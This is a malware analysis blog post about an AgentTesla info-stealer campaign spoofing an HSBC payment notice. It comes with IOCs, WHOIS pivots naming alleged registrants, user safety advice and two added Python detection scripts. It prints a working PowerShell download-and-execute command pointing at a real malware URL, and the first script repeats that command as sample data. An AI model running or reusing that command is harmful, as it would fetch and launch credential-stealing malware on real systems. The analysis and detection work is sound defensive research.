AgentTesla Keylogger Campaigns Continue

Office Macro Malware

We still see loads of AgentTesla keylogger / info-stealer malware campaigns hitting the UK most days. I don't often post them here unless there is something slightly different or unusual about either the delivery method or the malware itself. I just submit them to antivirus companies and most times tweet the details to other security researchers.

Today’s version is very slightly different and pretends to be a Bank Transfer Payment Notification allegedly coming from The Hongkong and Shanghai Banking Limited.

The email is the usual junk that should be blocked by most spam filters. The attachment is a .r00 file, which is one volume of a multi-part RAR archive (probably created that way in error). These only open in WinRAR, not in most versions of WinZip or the Windows built-in archive extraction tools. It isn't overly common for AgentTesla to use .bat files as part of the delivery chain.

This .bat file simply contains a one-line Windows PowerShell command that downloads the AgentTesla binary from a remote site, saves it to %TEMP% as Test.exe and runs it.

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php','%TEMP%\Test.exe');Start-Process '%TEMP%\Test.exe'
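Added example, not code from the original post: a small Python triage script that scores a batch file for the download-and-execute cradle described above and pulls out the download URL and the drop path as IOCs. SAMPLE_BAT is constructed to mirror the quoted one-liner; the indicator patterns, their weights and the alert threshold are my own assumptions. The same patterns also catch the Invoke-WebRequest / IEX and DownloadString variants of the cradle that this post does not show.

```python
"""Static triage of a .bat dropper carrying a PowerShell download cradle.

Added example, not code from the original post.  SAMPLE_BAT is constructed to
mirror the one-liner quoted in the post; the indicator patterns, their weights
and the alert threshold are the author's assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed stand-in for "Transfer Copy swift.bat" (straight quotes).
SAMPLE_BAT = r"""@echo off
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php','%TEMP%\Test.exe');Start-Process '%TEMP%\Test.exe'
"""

# (pattern, label, weight).  Weights are an assumption, set so that a single
# tell (e.g. -nop on its own) stays below the alert threshold.
INDICATORS = [
    (r"-ex(?:ecutionpolicy)?\s+bypass", "execution policy bypass", 2),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 1),
    (r"-nop(?:rofile)?\b", "no profile", 1),
    (r"net\.webclient", "WebClient object", 2),
    (r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", "download verb", 2),
    (r"start-process|invoke-expression|\biex\b", "execution verb", 2),
    (r"%temp%|\$env:temp\b|\\appdata\\local\\temp", "staging in %TEMP%", 1),
]
ALERT_THRESHOLD = 6  # assumption

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
# A quoted path under %TEMP% / $env:TEMP ending in an executable-type extension.
DROP_RE = re.compile(r"""['"]((?:%temp%|\$env:temp)[^'"]*\.(?:exe|dll|ps1|vbs|js))['"]""", re.I)


@dataclass
class Triage:
    score: int = 0
    hits: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    drop_paths: list = field(default_factory=list)

    @property
    def verdict(self):
        return "download-and-execute cradle" if self.score >= ALERT_THRESHOLD else "inconclusive"


def _add_unique(dst, items):
    """Append items to dst, keeping first-seen order and dropping repeats."""
    for item in items:
        if item not in dst:
            dst.append(item)


def triage_bat(text):
    """Score each PowerShell launch line in a batch file and extract its IOCs."""
    t = Triage()
    for line in text.splitlines():
        if not POWERSHELL_RE.search(line):
            continue                      # only PowerShell launch lines are scored
        for pattern, label, weight in INDICATORS:
            if re.search(pattern, line, re.I):
                t.score += weight
                t.hits.append(label)
        _add_unique(t.urls, URL_RE.findall(line))
        _add_unique(t.drop_paths, DROP_RE.findall(line))
    return t


if __name__ == "__main__":
    result = triage_bat(SAMPLE_BAT)
    print(result.verdict, "score", result.score)
    print("indicators:", ", ".join(result.hits))
    print("download URLs:", result.urls)
    print("drop paths:", result.drop_paths)
```

Run it against the extracted .bat instead of SAMPLE_BAT (`triage_bat(open(path, errors="replace").read())`) to get the URL and drop path without executing anything; the score is deliberately cumulative, since a hidden window or an execution-policy bypass on its own is common in legitimate admin scripts, while all of them together on one line almost never is.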

The website riderit.com appears to be a file hosting / public web-based backup service. Connections to it from the UK are extremely slow. We have seen quite a few different malware versions distributed via this network over recent months.

Transfer Copy swift.r00: extracts to Transfer Copy swift.bat. Current VirusTotal detections: [VirusTotal] | [anyrun]

Downloads the AgentTesla binary from http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php VirusTotal [web] [file]. This malware binary has been known about on VirusTotal for about a month now.

This exfils via SMTP using mail.trezaexim.com, using shivang@trezaexim.com and sending to maridiankft@gmail.com. I have seen numerous email addresses on trezaexim.com being used for these AgentTesla keylogger / info-stealer campaigns, all sending to maridiankft@gmail.com, which appears to be the listed registrant email for the domain and has a Nigerian address and phone number. The user name Mrfred434 has 8 other domains listed under that name, and the email address has 15 domains listed:

I have not checked how many are still live and active. Most are registered via PDR (PublicDomainRegistry):

interloom-pe.com 2018-10-23 publicdomainregistry.com
email-basware.com 2018-10-18 publicdomainregistry.com
ltssa-wood.com 2018-12-28 publicdomainregistry.com
luminosindia.com 2018-12-12 publicdomainregistry.com
tongiai.com 2019-02-01 publicdomainregistry.com
seastar-mairtime.com 2018-11-05 publicdomainregistry.com
mackereloiltools.com 2018-10-03 publicdomainregistry.com
trazaexim.com 2018-09-15 publicdomainregistry.com

almursad.com 2018-09-10 publicdomainregistry.com
grabsts.net 2019-03-07 publicdomainregistry.com
menexp.com 2018-08-13 publicdomainregistry.com
tytcwasteequipment.com 2019-07-21 publicdomainregistry.com
krress.com 2019-07-21 publicdomainregistry.com
kedahauji.com 2018-09-13 web4africa.net
evas-tr.com 2019-07-18 publicdomainregistry.com

Then we dig a bit more and find a name, Frederick Agwu, associated with the email address, who has a further 40 domains listed:

kedahauji.com 2018-09-13 web4africa.net
treassolutions.com 2015-12-04 publicdomainregistry.com
diplomatic-securityservice.com 2015-11-26 publicdomainregistry.com
govinadsteel.com 2017-08-07 publicdomainregistry.com
synmirise.com 2017-07-26 publicdomainregistry.com
supramexfire.com 2017-06-05 publicdomainregistry.com
hybsz-pl.com 2017-03-02 publicdomainregistry.com
magosnegt.net 2017-02-23 publicdomainregistry.com
hugoslyltd.com 2017-01-16 publicdomainregistry.com
halifacxz.com 2017-01-16 publicdomainregistry.com
weviio.com 2016-11-25 publicdomainregistry.com
lloydssbank.net 2016-09-17 publicdomainregistry.com
teromoto.com 2016-09-05 publicdomainregistry.com
ts-qlocal.com 2016-09-02 publicdomainregistry.com
tgf-group-cin.com 2016-09-02 publicdomainregistry.com
combinaparts.com 2016-08-31 publicdomainregistry.com
armada-shiping.com 2016-08-29 publicdomainregistry.com
dongfangpart.com 2016-08-02 publicdomainregistry.com
techno–filt.com 2016-07-10 publicdomainregistry.com
szlongzhang.com 2016-06-10 publicdomainregistry.com
geraldschembers.com 2016-05-28 publicdomainregistry.com
mod-ec.com 2016-04-05 publicdomainregistry.com
arkocmuh.com 2016-01-27 publicdomainregistry.com
setorp.com 2016-01-12 publicdomainregistry.com
bibby-ste-criox.com 2017-08-07 publicdomainregistry.com
velebattery.com 2017-03-15 publicdomainregistry.com
newgenerals.net 2017-01-16 publicdomainregistry.com
tqtal.com 2016-12-09 publicdomainregistry.com
bevaria-firefighting.com 2016-02-05 publicdomainregistry.com
highflly-sh.com 2016-08-29 publicdomainregistry.com
0mbg.net 2016-06-21 publicdomainregistry.com
rroca.net 2016-04-04 publicdomainregistry.com
diplomatics-securityservice.com 2016-01-07 publicdomainregistry.com
diplomatic-securityservices.com 2016-01-07 publicdomainregistry.com
pyrazienspecialties.com 2017-08-10 publicdomainregistry.com
defaomfg.com 2016-12-13 publicdomainregistry.com
asiastarbevarage.com 2016-05-15 publicdomainregistry.com
aeeccnc.com 2017-08-16 publicdomainregistry.com
scandl.net 2017-03-19 publicdomainregistry.com
takweenei.com 2017-08-09 publicdomainregistry.com
floawsreve.com 2017-08-17 namebright.com
masteel-uk.com 2016-12-12 publicdomainregistry.com
dkm-e.com 2016-01-11 ascio.com
dhl-expres.com 2016-04-04 ilovecom
wangyamotor.com 2016-06-24
tekasago.com 2017-08-04 domains.google.com

Even more digging finds yet another email address, infocrescentksa@yahoo.com, with 51 listed domains:

diplomatics-securityservice.com 2016-01-07 publicdomainregistry.com
setorp.com 2016-01-12 publicdomainregistry.com
arkocmuh.com 2016-01-27 publicdomainregistry.com
rroca.net 2016-04-04 publicdomainregistry.com
mod-ec.com 2016-04-05 publicdomainregistry.com
asiastarbevarage.com 2016-05-15 publicdomainregistry.com
geraldschembers.com 2016-05-28 publicdomainregistry.com
szlongzhang.com 2016-06-10 publicdomainregistry.com
0mbg.net 2016-06-21 publicdomainregistry.com
techno–filt.com 2016-07-10 publicdomainregistry.com
dongfangpart.com 2016-08-02 publicdomainregistry.com
highflly-sh.com 2016-08-29 publicdomainregistry.com
armada-shiping.com 2016-08-29 publicdomainregistry.com
combinaparts.com 2016-08-31 publicdomainregistry.com
tgf-group-cin.com 2016-09-02 publicdomainregistry.com
ts-qlocal.com 2016-09-02 publicdomainregistry.com
teromoto.com 2016-09-05 publicdomainregistry.com
lloydssbank.net 2016-09-17 publicdomainregistry.com
bevaria-firefighting.com 2016-02-05 publicdomainregistry.com
weviio.com 2016-11-25 publicdomainregistry.com
tqtal.com 2016-12-09 publicdomainregistry.com
defaomfg.com 2016-12-13 publicdomainregistry.com
halifacxz.com 2017-01-16 publicdomainregistry.com
newgenerals.net 2017-01-16 publicdomainregistry.com
hugoslyltd.com 2017-01-16 publicdomainregistry.com
magosnegt.net 2017-02-23 publicdomainregistry.com
hybsz-pl.com 2017-03-02 publicdomainregistry.com
velebattery.com 2017-03-15 publicdomainregistry.com
scandl.net 2017-03-19 publicdomainregistry.com
supramexfire.com 2017-06-05 publicdomainregistry.com
neatorobatic.com 2015-10-07 enom.com
opulant-group.com 2015-10-07 enom.com
serashkco.com 2015-10-04 enom.com
ghosexport.com 2015-09-13 enom.com
reffco.net 2015-09-10 enom.com
woodenweres.com 2015-09-08 enom.com
stemcoo.com 2015-08-29 enom.com
perfactintl.com 2015-08-28 enom.com
ratnakerovarseas.com 2015-08-24 enom.com
thermoleb.com 2015-07-13 enom.com
oranga-fr.com 2015-08-26 enom.com
asferholding.com 2015-08-26 enom.com
synmirise.com 2017-07-26 publicdomainregistry.com
govinadsteel.com 2017-08-07 publicdomainregistry.com
takweenei.com 2017-08-09 publicdomainregistry.com
pyrazienspecialties.com 2017-08-10 publicdomainregistry.com
aeeccnc.com 2017-08-16 publicdomainregistry.com

I am sure that if I kept digging, or someone with more time did, hundreds more domains associated with these Nigerian criminals could be found, and hopefully law enforcement can take some action.

You can now submit suspicious sites, emails and files via our Submissions system

Neither The Hongkong and Shanghai Banking Limited nor contact@crimbotour.ro has been hacked or had their email or other servers compromised. They are not sending the emails to you; they are innocent victims in exactly the same way as every recipient of these emails. These are coming from a Vietnamese IP address, 103.125.189.115, that is very well known for all sorts of malicious activity.

This malware file downloads from

One of the emails looks like:

From: The Hongkong and Shanghai Banking Limited <contact@crimbotour.ro>

Date: Wed 11/09/2019 02:41

Subject: Bank Transfer Payment Notification

Attachment: Transfer Copy swift.r00

Body Content:

Our Ref: HSBCT8723.

Find enclosed Hire payment proof made to your company account on behalf of our client to your receiving bank dated 10/09/2019.

Kindly confirm payment and client Ref details from attached swift Copy and advice accordingly.

Thanks and regards,
David Wong
Funds Transfer Dept.,
Business Banking, Eastern District, Commercial Banking
The Hongkong and Shanghai Banking Corporation Limited (HSBC)
14/F, Causeway Bay Plaza Two, 463-483 Lockhart Road,
Causeway Bay, Hong Kong.
Email: customerservice@hsbc.com.hk

Screenshot:

These malicious attachments normally have a password-stealing component, with the aim of stealing your bank, PayPal or other financial details along with your email or FTP (web space) login credentials. Many of them are also designed to specifically steal your Facebook and other social network login details. A very high proportion are ransomware versions that encrypt your files and demand money (about £350/$400) to recover the files.

All the alleged senders, amounts, reference numbers, Bank codes, companies, names of employees, employee positions, email addresses and phone numbers mentioned in the emails are all random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.

This is another one of the files that, unless you have "show known file extensions" enabled, can easily be mistaken for a genuine DOC / PDF / JPG or other common file instead of the .BAT (or .EXE / .JS) file it really is, making it much more likely that you will accidentally open it and be infected.

Be very careful with email attachments. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email, whether it is a message saying "look at this picture of me I took last night" that appears to come from a friend, or something more targeted at somebody who is likely to regularly receive PDF attachments, Word .doc attachments or any other common file type that you use every day.

The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of them doing silly things, or even cute pictures of the children or pets.

Never just blindly click on the file in your email program. Always save the file to your downloads folder so you can check it first. Many malicious files attached to emails have a faked extension, the three or four letters at the end of the file name. Unfortunately Windows hides file extensions by default, so you need to set your folder options to show them (in File Explorer's folder options, untick "Hide extensions for known file types"). Then, when you unzip the archive that is supposed to contain the pictures of "Sally's dog catching a ball", or a report in Word format that work has supposedly sent you to finish at the weekend, or an invoice or order confirmation from some company, you can easily see whether it is a picture or document and not a malicious program.

If you see .JS, .EXE, .COM, .PIF, .SCR, .HTA, .VBS, .WSF, .JSE or .JAR at the end of the file name, or .BAT / .CMD (today's sample uses .BAT), DO NOT click on it or try to open it: it will infect you.

While the malicious program is inside the zip file, it cannot harm you or automatically run. When it is just sitting unzipped in your downloads folder it won’t infect you, provided you don’t click it to run it. Just delete the zip and any extracted file and everything will be OK.

You can always run a scan with your antivirus to be sure. A plain zip cannot run anything by itself, but a self-extracting archive is really an .EXE and will run whatever the bad guys packed into it when you double-click it. If you save any suspicious archive to a folder on the computer, then right-click it and select extract here or extract to folder instead of double-clicking it, that risk is virtually eliminated.

Never attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just delete the unexpected zip and not risk any infection.

IOC:

Main object: "Transfer Copy swift.r00"
SHA-256 c173764e5b509cf3d53503cd58dd35aee0d74a82da1de4c1252667a263638265
SHA-1 44d8a0fdbf99ce48f0c7b8a6cb4b0c0187557d98
MD5 ad695f5ee0d5767da3305522d819b4f1

Dropped executable file: C:\Users\admin\AppData\Local\Temp\Test.exe
SHA-256 33d2ee7d7ef16344682b121cee3fb189dbdcc070ab7552b150360e418d700a4c
SHA-1 21d665dd0c37648ab018fff4b06889e14cbe7e16
MD5 131c2c561ed08be561321f706140bd43

DNS requests
domain checkip.amazonaws.com
domain web.riderit.com
domain mail.trezaexim.com

Connections
ip 18.205.71.63
ip 216.55.169.138
ip 1.217.125.148

HTTP/HTTPS requests
url http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php
url http://checkip.amazonaws.com/

Registrant details from the WHOIS pivot above:

maridiankft@gmail.com
infocrescentksa@yahoo.com
Frederick Agwu
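Added example, not from the original post: Python that matches the IOCs listed above against host telemetry and also flags the sequence the DNS list implies, an external-IP lookup to checkip.amazonaws.com followed shortly by outbound SMTP to a server that is not the organisation's own relay. checkip.amazonaws.com is a legitimate service and the AWS address it resolves to is shared infrastructure, so neither is a useful block-list entry on its own; the sequence is what matters. The indicator values are copied from the IOC section; the log lines are constructed, and the event format, the ten-minute window and the allowed mail relay (smtp.corp.example) are assumptions.

```python
"""Match the post's IOCs against host telemetry and flag the AgentTesla-style
'external-IP lookup, then outbound SMTP' sequence.

Added example, not code from the original post.  The indicator values are copied
from the post's IOC section; the log lines are constructed, and the event format,
the correlation window and the allowed mail relay are the author's assumptions.
"""
from datetime import datetime, timedelta

# Indicators copied from the IOC section of the post.
IOC_DOMAINS = {"web.riderit.com", "mail.trezaexim.com"}
IOC_IPS = {"216.55.169.138", "1.217.125.148"}   # 18.205.71.63 left out: shared
                                                 # AWS (checkip) infrastructure
IOC_SHA256 = {
    "c173764e5b509cf3d53503cd58dd35aee0d74a82da1de4c1252667a263638265",  # .r00
    "33d2ee7d7ef16344682b121cee3fb189dbdcc070ab7552b150360e418d700a4c",  # Test.exe
}
# Legitimate on its own; it matters only as the first step of the exfil sequence.
IP_LOOKUP_HOSTS = {"checkip.amazonaws.com"}
ALLOWED_MAIL_SERVERS = {"smtp.corp.example"}  # assumption: the org's own relay
WINDOW = timedelta(minutes=10)                 # assumption: lookup-to-SMTP gap

# Constructed telemetry, one event per line: "<ISO timestamp> <host> <kind> <value>"
SAMPLE_LOG = """\
2019-09-11T02:45:10 PC-07 dns web.riderit.com
2019-09-11T02:45:11 PC-07 conn 216.55.169.138:8000
2019-09-11T02:45:40 PC-07 file 33d2ee7d7ef16344682b121cee3fb189dbdcc070ab7552b150360e418d700a4c
2019-09-11T02:45:42 PC-07 dns checkip.amazonaws.com
2019-09-11T02:45:45 PC-07 smtp mail.trezaexim.com:587
2019-09-11T03:10:02 PC-12 dns checkip.amazonaws.com
2019-09-11T03:12:30 PC-12 smtp smtp.corp.example:587
2019-09-11T03:40:00 PC-19 smtp mail.trezaexim.com:25
"""


def parse(log):
    """Turn the text log into (timestamp, host, kind, value) tuples."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, kind, value = line.split(maxsplit=3)
        events.append((datetime.fromisoformat(ts), host, kind, value))
    return events


def _endpoint(kind, value):
    """Strip the :port from connection-type events so hosts/IPs compare cleanly."""
    return value.rsplit(":", 1)[0] if kind in ("conn", "smtp") else value


def ioc_hits(events):
    """Exact matches against the published indicators, per event kind."""
    hits = []
    for _, host, kind, value in events:
        target = _endpoint(kind, value)
        matched = (
            (kind in ("dns", "smtp") and target in IOC_DOMAINS)
            or (kind == "conn" and target in IOC_IPS)
            or (kind == "file" and target in IOC_SHA256)
        )
        if matched:
            hits.append((host, kind, target))
    return hits


def exfil_sequences(events):
    """Hosts that resolve an external-IP service and then, within WINDOW, speak
    SMTP to a server that is not the organisation's relay.  This catches the
    AgentTesla exfil pattern even when the mail server is not yet on an IOC list."""
    last_lookup = {}
    flagged = []
    for ts, host, kind, value in sorted(events):
        if kind == "dns" and value in IP_LOOKUP_HOSTS:
            last_lookup[host] = ts
        elif kind == "smtp":
            server = _endpoint(kind, value)
            seen = last_lookup.get(host)
            if seen is not None and ts - seen <= WINDOW and server not in ALLOWED_MAIL_SERVERS:
                flagged.append((host, server))
    return flagged


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for hit in ioc_hits(evs):
        print("IOC match:", *hit)
    for host, server in exfil_sequences(evs):
        print("exfil sequence:", host, "->", server)
```

In the constructed log PC-07 is caught both ways, PC-19 only by the mail.trezaexim.com indicator, and PC-12 is left alone because its post-lookup SMTP goes to the corporate relay. The behavioural rule is the one worth keeping: the sender addresses on trezaexim.com change between campaigns, as the post notes, but the lookup-then-SMTP sequence does not.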
